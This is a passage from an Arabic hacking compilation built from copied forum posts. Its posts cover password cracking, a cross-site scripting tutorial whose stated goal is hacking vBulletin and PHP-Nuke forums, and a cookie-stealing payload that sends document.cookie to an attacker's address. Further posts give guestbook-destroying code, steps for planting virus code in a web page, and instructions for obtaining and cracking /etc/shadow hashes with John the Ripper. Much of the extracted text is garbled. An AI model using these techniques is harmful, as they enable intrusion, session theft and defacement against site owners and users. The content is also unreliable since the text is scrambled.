  ‫هذا يعني انه استعراض رئيسي للمجال وهذا من اكبر االخطاء التي يقومون بها مدراء الشبكات الن مراقب‬
             ‫المجال يدوخ ال يستطيع التجميع وتستطيع استغالل مثل هذه الثغرات دائما في الشبكات الداخليه‬
                                                               ‫طيب انت االن حصلت على اسم المتسخدم‬
   ‫انت محتاج كلمه المرور وهذي هي المشكله يعني انت ضميت جهازك مع الشبكه لكن ماقدرت تحصل على‬
‫كلمه المرور لكن تقدر تحصل عليها ‪ nt senstiver‬او متحسس الشبكه ( معليش ماني متاكد من السبيلنق‬
                                                                                                 ‫).‬
                                                            ‫طيب كيف اقدر احصل فعليا على كلمه المرور‬
                                     ‫غالبا ماتكون كلمات مرور المستخدمين تاففه جدا هاذ اذا وجدت اصال‬
                                                      ‫يعني برنامج مثل ‪ l0pthcrack‬يحل لك المشكله.‬

                                              ‫انتهى،،،‬




                                               ‫972‬
‫" ‪" Cross Site Scripting‬‬

                           ‫<منقول من منتدى الحلم>‬
                                   ‫<الكاتب:‪> tcp‬‬

                                       ‫المتطلبات :‬

                           ‫معرفة تامه بلغة ‪HTML‬‬



          ‫082‬
   ‫اطالع غير متعمق على لغات السكربتينق وهي ‪JAVASCRIPT ,PERL ,CGI ,VBSCRIPT‬‬

                                    ‫ومن وجهة نظر شخصية المصايب كلها من الجافا سكربت والهتمل‬

‫===========================================================‬
                       ‫====================================‬


                                                                                 ‫االهداف المنشوده :‬

                      ‫* افهام القارئ عن الكيفية التى يتم فيها سرقة معلومات هامه من جهاز المستخدم‬

  ‫* اختراق المنتديات من نوع ‪ VBULLETIN‬او ‪ YaBB and UBB‬او المجالت من البهب نيوك او‬
                                                                      ‫بوست نيوك‬

               ‫*افهام القراء عن الكيفية التي تتم فيها سرقة الكوكيز او اختطاف الجلسة من المستخدمين‬

                                                         ‫* ان يستطيع القارئ توسيع مداخل االختراق‬

‫===========================================================‬
                      ‫=====================================‬

                                                                                     ‫جمله عرضية :‬

 ‫االختراق ليس اال تشغيل للمخ واستغالل الشياء لها فائده وارجو من يقرا هذا الموضوع بان يحاول التعود‬

       ‫على مسألة القراءة والترجمه ثم يلجأ الى التطوير ويترك عنه مسألة المطامر من منتدى لمنتدى او‬

      ‫المواقع التي تطر ح الثغرات االمنية ...هل نحتاج الى امة تطور نفسها .. ام نطور انفسنا نحو االمية‬

‫===========================================================‬
                      ‫=====================================‬

                                                                                          ‫المشكلة :‬

  ‫كما هو معروف فان مستعرضات الوب مثل االكسبلورر او نت سكيب ... الخ تاتي مترجمات النصوص او‬
                                                                                ‫السكربتات‬

    ‫مبنية داخلها ويتم ترجمة السكربتات على جهاز المستخدم فلو اننا طلبنا صفحة كان بها سكربت معين‬

                            ‫فان المستعرض يترجم هذا السكربت ويظهره على نفس الصفحه المطلوبه .‬

   ‫اما بالنسبة للمنديات او مجموعات النقاش فانها ترفض مثل هذه السكربتات وتعتبرها خرق للخصوصية‬

                               ‫او قد تستغل في اغراض سيئة لسرقة معلومات حساسة من المستخدمين‬

                                                          ‫المثال التالي يوضح كيفية ادراج السكربت :‬

                                            ‫‪message. Hello FOLKS board. This is a‬‬



                                             ‫182‬
                                                 ‫<‪>SCRIPT/<malicious code>SCRIPT‬‬

                                                        ‫‪end of my message. This is the‬‬

  ‫ان كلمة ‪ malicious code‬تم ادرجها او حقنها في بين عالمتي السكربت وقد تحتوي على كود خبيث‬

  ‫يسرق او يرسل بيانات ... الخ لذلك فان مصمموا برامج المنتديات ومطوروا يمنعونها اال اذا مكنها االدمن‬

‫او المصمم او قد يتم استخدامها اذا مكن المنتدى تفيل ‪ HTML‬مثال يتم ادراج السكربت مكان خاصية االمج‬

                                              ‫<‪img<document.write('>script‬‬
                ‫"'+‪>script/<;'>src="http://my_ip_address/'+document.cookie‬‬

    ‫او قد يستطيع السكربت ان يكتب على شكل رابط في صفحة او يرسل لك بالبريد او يرسل لك عن طريق‬
                                                                                   ‫المسنجر‬

                                                    ‫والمثال التالي يوضح لك كيفية عمل رابط في صفحة‬

                          ‫<‪HREF="http://example.com/comment.cgi? A‬‬
      ‫=‪>A/<Click here >">SCRIPT/<code malicious>SCRIPT<mycomment‬‬

 ‫انظر هنا وركز في كيفية عمل الكود انها فقط عندما يصلك باحد الطرق المذكوره اعاله وتضغط عليه سينفذ‬
                                                                                        ‫السكربت‬

‫وللشر ح اكثر لنفرض ان السكربت ‪ comment.cgi‬سكربت يرسل مالحظاتك لصاحب الموقع او قد يكون‬
                                                                       ‫سكربت للبحث‬

‫في الموقع او المنتدى وهو يحتوي على متغير داخله اسمه ‪ mycomment‬ياخذ المدخالت او المالحظات‬
                                                                              ‫التي تكتبها‬

    ‫فلو اعتبرناه انه سكربت بحث ويولد صفحات ديناميكية ناتجه من البحث ستكون النتائج وخيمة فبدل ان‬

 ‫ينتج الصفحات الحيوية او النشطه سينتج مايطلبه السكربت منه الحظ الفكره هنا فقد ضمن السكربت داخل‬

                   ‫حقل نصي فبدال من ان ياخذ الحقل النصي نصوص استخدم ليأخذ اوامر من السكربت .‬

                                                        ‫الحظ المثال التالي :‬   ‫وحتى اعقد االمور اكثر‬

    ‫<‪SCRIPT<HREF="http://example.com/comment.cgi? mycomment= A‬‬
            ‫'‪>A/<here Click >">SCRIPT/<>SRC='http://bad-site/badfile‬‬

‫هنا استخدم نفس السكربت السابق لكن هذه المره طوره اكثر ليكون مستخدما في ادراج ملف من موقع اخر‬
                                                                                      ‫والذي‬

‫هو باالسم ‪ BADFILE‬والن مصدر البيانات ادخل فيه عدة مصادر اخرى عن طريق السكربت المذكور فأن‬
                                                                              ‫هذا الهجوم‬

‫يسمى ب ‪ cross-site scripting‬او الترجمه من عندي " برمجة عبور الموقع " الننا عبرنا باستخدام‬
                                                                                    ‫برمجة‬



                                              ‫282‬
‫السكربتات اكثر من موقع واذا كنت تالحظ في السيكيورتي فوكس او المواقع االمنيه تختصر ب ‪ CSS‬وهي‬
                                                                                    ‫اختصار‬

   ‫ل ‪ scripting cross-site‬وليس ل ‪ CASCADE style sheets‬اي اوراق االنماط المتتالية‬


                                           ‫قد يدخل بدل الوسم او عالمة السكربت اي من الوسوم التالية‬

                              ‫<‪>EMBED< and ,>APPLET< ,>OBJECT< ,>SCRIPT‬‬

‫ومن الممكن ان يكون هناك وسم النماذج <‪ >form‬من وسوم ‪ HTML‬وبنفس االفكار السابقة يمكن تنفيذ‬
                                                                                  ‫االوامر‬

                                        ‫منها لسرقة الكوكيز او بيانات اخرى او توجيهك لصفحات اخرى‬

              ‫اذا كنت قرات ماكتبته عن التكويد السداسي عشر واليونيكود تستطيع االن ان تفهم ما اقصده‬



  ‫=========================================================‬

                                                                              ‫ولمزيد من التفاصيل :‬

                                               ‫‪http://www.cert.org/advisories/CA-2000-02.html‬‬


                                              ‫‪http://www.perl.com/pub/a/2002/02/20/css.html‬‬




                                             ‫انتهى،،،‬




                        ‫" كود تدمير سجل الزوار "‬

                                                                      ‫<منقول من منتديات المهندس>‬
                                                                               ‫<الكاتب: العبقري>‬
‫كود صغير جدا بحجمه,كبير بقدرته على تدمير سجل الزوار بالكامل...انتم تعرفون طبعا كيفية عمل توقيع في‬
  ‫سجل الزوار,األسم- األيميل- موقعك الشخصي-تقديرك للموقع- طريقة األستدالل......والنقطه المهمه وهي‬
                                                                     ‫كتابة تعليقك على الموقع؟؟؟؟؟؟؟‬

       ‫نحن سوف نضع كل شي حسب ما هو مطلوب ولكن عندما نأتي لكتابة التعليق...........نقف ونكتب:‬


                                              ‫382‬
                                                                                            ‫.‬
                                                                                            ‫.‬
                                                                                            ‫.‬
                                                                                            ‫.‬
                                                                                            ‫.‬
                                                                                            ‫.‬
                                                                                            ‫.‬
                                                                                            ‫.‬
                                                                                           ‫.‬
                                                                                            ‫.‬
                                                                                            ‫.‬
                                                                                            ‫.‬
                                                                                                ‫.‬


                                                   ‫هذا هو الكود :‬
         ‫==================================================‬

                                                               ‫=‬
                         ‫--<>‪h3>put your text here<xmp><plaintext‬‬
         ‫==================================================‬




  ‫يمكنك كتابة اي شي تريد في مكان.... ‪ put your text here‬وهذا كل شي ....بعد توقيعك اعمل‬
                                                               ‫ريفريش وانظر ماذا حصل‬




                                                                                   ‫مالحظه:‬
                                                                                 ‫=====‬
                                                     ‫الكود ال يعمل مع بعض انواع سجل الزوار؟!‬



                                        ‫انتهى،،،‬

                     ‫" وضع فايروس في صفحة "‬

                                                                    ‫<منقول من منتدى إعصار>‬
                                                                     ‫<الكاتب:‪> Dr^FunnY‬‬

        ‫اختار صفحة جديدة ... هاتالقي تحت ثالث مربعات االول عادي والثاني ‪ html‬والثالث معاينة‬
                                                                           ‫انت خليك في العادي‬
                                                                                   ‫اختار ادراج‬
‫ثم اختار مكون ويب..... هايطلعلك جدول صغير من خانتين ... خليك في الخانة االولى اللي على اليمين‬



                                         ‫482‬
‫واختار منها ااخر اختيار اللي هو "عناصر تحكم متقدمة" اضغط ضغطه واحده وهايظهرلك عناصر في الخانه‬
‫اللي على اليسار اختار اول اختيار اللي هو ... "‪ "HTML‬هايفتحلك مربع تاني... انت عليك تحط في المربع‬
                                              ‫ده كود الفيرس وتضغط موافق :) وكده الطبخة استوت .‬
         ‫واوعى تضغط على معاينة الصفة وانت معندكش نورتن لكن لو عندك هايديك تحذير بوجود فيروس‬
           ‫الطريقه للي عنده فرونت بيج عربي واللي عنده انجليزي هي نفس الخطوات مع تغيير االسامي.‬


                                           ‫انتهى،،،‬




                                   ‫" الثغرااات "‬

                                                                         ‫<منقول من موقع الجهاد>‬

                                                                     ‫‪ = Exploit‬اسثمار = ثغرة‬
                                                                                    ‫الجزء المهم:‬
     ‫الثغرات هي أخطاء برمجية في نظام التشغيل ويمكنك استغاللها للحصول على ملف الباسوورد وقاعدة‬
                                                                              ‫البيانات وووو..إلخ‬
                                             ‫أوال يجب أن تجمع كل المعلومات الممكنة حول الموقع :‬
                          ‫2- المنافذ المفتوحة مثل اإلف تي بي والتلنت مثال وهذ عن طريق برامج مثل‬
                                                                                ‫‪super scan‬‬


                                             ‫582‬
                                                                                 ‫ابحث عنه في االنترنت.‬
 ‫6- معرفة نظام تشغيل الموقع ويندوز أم لينوكس وغيرها والفائدة من ذلك أن كل نظام له ثغراته الخاصة به‬
                                       ‫واسم المجلد الذي به ملف الباسوورد يختلف من نظام تشغيل آلخر.‬
                                                                   ‫لمعرفة نظام التشغيل إذهب إلى الموقع‬
                                                                                ‫‪www.netcraft.net‬‬
             ‫واكتب الموقع ثم إنتر..!!.! وستعرف بعض المعلومات عن الموقع كآليبي ونظام التشغيل...إلخ‬
                                              ‫3- معرفة كل مايقدمه الموقع من خدمات كالبريد وغير ذلك‬
                                ‫.- معرفة البرامج المثبتة على الموقع مثل المنتديات وبرامج السي جي آي‬
                                                                                           ‫أنواع الثغرات‬
                                       ‫أبسط األنواع هي التي يمكن الوصول إليها عن طريق المتصفح مثل‬
                                                                       ‫/....../‪www.thesite.com‬‬
                                                                       ‫واألنواع الباقية أو االستثمارات :‬
                                                                           ‫ثغرات مكتوبة بلغة بيرل *.‪pl‬‬
                                         ‫ويمكن استخدامها في لينوكس أو في ويندوز إذا كان لديك برنامج‬
                                                                                        ‫‪Active Perl‬‬
                                                                                         ‫ثغرات بلغة سي‬
                                                                   ‫*.‪ c‬يمكن استخدامها في لينوكس فقط‬
                                                                                         ‫ثغرات بلغة شل‬
                                                                 ‫*.‪sh‬ويمكن استثمارها في لينوكس فقط‬
                   ‫ويمكنك إيجاد الكثير من األنواع السابقة الخاصة بلينوكس فيمواقع الثغرات وإليك بعضها‬
                                                                      ‫‪www.securiteam.com‬‬
                                                                   ‫‪www.securityfocus.com‬‬
                                                                            ‫‪www.ukrt.f2s.com‬‬
                                                                          ‫‪www.ussrback.com‬‬
                                                      ‫‪www.packetstorm.securify.com‬‬
                                                                      ‫‪www.secureroot.com‬‬
                                                                          ‫‪www.rootshell.com‬‬
                              ‫أما ثغرات المتصفح يمكنك الكشف عنها بالبرامج الموجودة في قسم البرامج.‬
    ‫ويمكنك من خالل البرامج الموجودة على السيرفر كالمنتديات أو برمجيات بيرل وسيجي آي أن تبحث عن‬
‫ثغرات لها في مواقع الثغرات أو المواقع السابقة.وبرمجيات بيرل وسي جي آي قد تكون كتاب زوار أو محرك‬
                                                                                 ‫بحث أو حتى عداد زوار‬
  ‫حسنا لنفرض أنك حصلت على ملف الباسوورد..المشكلة أن كلمةالسر تكون بداخله مضللة ‪shadowed‬‬
                                                                             ‫أو مشفرة .‪encryption‬‬
                                                                                    ‫مثال لملف باسوورد‬
      ‫:/::1:1:‪bin:x:2:2::/usr/bin: root:x:0:1:Super-User:/:/sbin/sh daemon:x‬‬
              ‫‪Printer sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line‬‬
    ‫‪Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp‬‬
                                               ‫‪Admin:/usr/lib/uucp: nuucp:x:9:9:uucp‬‬
  ‫وألن ملف الباسوورد يحتوي على كلمات سر األشخاص المرخص لهم بدخول الموقع قد ال بزيد عن عشرة‬
                                                                         ‫أسطر وقد يصل آالف األسطر...‬
                                                  ‫كلمات السر السابقة مضللة وهي عالمة ‪x‬وقد تختلف..‬
                                                           ‫أما المشفرة والتي سنحصل عليها تكون هكذا:‬
                                                ‫مضللة ‪root:x:0:1:Super-User:/:/sbin/sh‬‬
                          ‫مشفرة ‪root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh‬‬
                                                                       ‫‪ = root‬أو الجذر اسم المستخدم‬
                                                                            ‫‪ = x‬كلمةالسر ولكنها مضللة‬
                                                                                  ‫وباقي السطر غير مهم‬
    ‫في األغلب ستكون كلمة السر مضللة ‪ shadowed‬لذا عليك أن تبحث عن ملف آخر يحوي كلمة السر‬
                                                                               ‫مشفرة يسمى ملف الشادو‬
                                                                                       ‫‪shadow file‬‬


                                                 ‫682‬
                                                ‫ويوجد في أماكن معينة تختلف باختالف نظام التشغيل‬
                                                          ‫‪ = token‬الرمز الذي يعبر عن الباسوورد‬

     ‫‪token = * etc/shadow‬‬                                                            ‫: ‪/ Linux‬‬
         ‫‪ = SunOS : /etc/shadow‬يأخذ أشكال متعدده اشهرها هو *‬                             ‫‪token‬‬
    ‫‪ FreeBSD : /etc/master.passwd or /etc/shadow‬والجديد هو ‪x‬‬                        ‫* = ‪token‬‬
     ‫‪token = x etc/shadow‬‬                                                              ‫: ‪/ IRIX‬‬
    ‫‪token = ! etc/security/passwd‬‬                                                       ‫: ‪/ AIX‬‬
   ‫‪etc/shadpw‬‬                                  ‫‪token = */ ConvexOS : /etc/shadow or‬‬
                                                                                 ‫مثال لملف شادو‬
     ‫::::::09311:‪bin:NP:6445:::::: sys:NP:6445:::::: root:EpGw4GekZ1B9U‬‬
   ‫::::::53901:‪admin:9z8VMm6Ovcvsc:10935:::::: # adm:IyEDQ6VoRlLHM‬‬
                                                                           ‫::::::5446:‪lp:NP‬‬
                                                                          ‫نجد أن كلمة السر هي‬
                                                                       ‫‪EpGw4GekZ1B9U‬‬
                                                                               ‫كيف تفك التشفير؟‬
                                ‫عن طريق برامج مخصصة لذلك أفضلها تجده في صفحة برامج الثغرات‬
                                                                          ‫‪ripper John the‬‬
                                 ‫وهو يقوم بتجريب كل المحاوالت الممكنة حتى يحصل على الباسوورد .‬
‫ولكن يجب أن تضع له الباسووردات في ملف مفكرة مثال وعليك وضع الكلمة المشفرة بدال من ال‪ x‬وعليك‬
                                                            ‫ترتيبها بحيث يكون كل حساب في سطر‬
                                                                                  ‫طريقة تشغيله:‬
                                                                         ‫إذهب إلى الدوس واكتب‬
                                                                              ‫‪john passwd‬‬
                                      ‫حيث ‪ passwd‬هو الملف الذي به الباسوورد المشفرة وضعتها‬
                                                                                        ‫سيظهر :‬
                  ‫‪Version 1.3 Copyright (c) 1996 by Sola 97,John the Ripper‬‬

                                                                      ‫‪Loaded 1 password‬‬

                        ‫**:‪c/s: 6401 w: *****DONE %88 2:22:22:22 v: 0 c: 6401 t‬‬
                                             ‫وإذا أردت معرفة الباسوورد التي يخمنها اآلن اضغط انتر‬
                         ‫والباسوورد الصحيحة ستحفظ في ملف في نفس المجلد الذي به البرنامج اسمه‬
                                                                                      ‫‪john.pot‬‬
                                ‫وإذا أردت القيام بعملية كسر أخرى عليك إلغاء الملف أو تغيير اسمه .‬


                                           ‫انتهى،،،‬
                    ‫" شرح شبه مفصل عن الثغرات "‬

                                                                       ‫<منقول من منتدى إعصار>‬
                                                                               ‫<الكاتب: ‪>icer‬‬
                                                      ‫الموضوع اليوم ينقسم الى التالي :‬
                                                               ‫2 كيف تجد اكسبلويتات ؟‬
                              ‫6كيف تستعمل االكسبلويتات ( دعونا نسميها استثمارات ) ؟‬
                                                     ‫3 انواع مختلفه من االستثمارات...‬
                                                   ‫. مواقع مفيده للبحث عل الثغرات...‬
             ‫××××××××××